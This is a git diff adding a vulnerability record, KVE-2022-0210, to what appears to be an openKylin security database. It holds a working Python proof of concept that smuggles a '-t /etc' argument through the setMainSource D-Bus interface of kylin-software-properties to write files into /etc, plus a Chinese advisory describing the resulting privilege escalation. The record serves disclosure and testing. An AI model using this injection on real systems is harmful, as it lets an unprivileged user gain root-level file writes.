diff --git a/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
new file mode 100644
index 0000000000000000000000000000000000000000..19f07b572ec81ef3c62f753df99ad704c7f65abf
--- /dev/null
+++ b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+
+import sys
+import dbus
+import os
+
+def set_main_source(target_dir, src_file):
+  bus = dbus.SystemBus()
+  obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
+  proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
+  proxy.setMainSource([f'-t {target_dir} {src_file}'])
+  os.system('touch set_main_source.txt')
+
+set_main_source("/etc", os.path.realpath('./set_main_source.txt'))
+os.system('ls -l /etc/set_main_source.txt')
+os.system('rm set_main_source.txt')
\ No newline at end of file
diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..60a558db3cf25e1206bce95cdea6a0960084ba92
--- /dev/null
+++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
@@ -0,0 +1,19 @@
+id: KVE-2022-0210
+source: openKylin Community
+info:
+  name: 源管理服务的setMainSource接口任意文件写入漏洞。
+  severity: critical
+  description: |
+    com.kylin.software.properties.interface.setMainSource接口存在任意文件写入漏洞。实现方法是调用命令"cp file /etc/apt/sources.list"。但如果传递的参数为"['-t /etc /path/to/evil.txt']，由于开发者在实现时会将这个字符串按空格进行分割，并作为参数传递到cp命令，因此就会触发命令 "cp -t /etc /path/to/evil.txt /etc/apt/sources.list"，从而实现任意文件夹的任意文件写入，导致权限提升。任意命令。
+  scope-of-influence:
+    kylin-software-properties< 0.0.1-127
+  reference:
+    - https://kylinos.cn/support/loophole/patch/1871.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: None
+    cwe-id: None
+    cnvd-id: None
+    kve-id: KVE-2022-0210
+  tags: kve2022,dbus
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 1148d39b288061b5602a642d94647f19ebbe57a5..475177cc68dc10ca7a74f844196d6247d9a49a8c 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -22,4 +22,6 @@ cve:
   polkit:
     - CVE-2021-4034
 cnvd:
-kve:
\ No newline at end of file
+kve:
+  kylin-software-properties
+    - KVE-2022-0210
\ No newline at end of file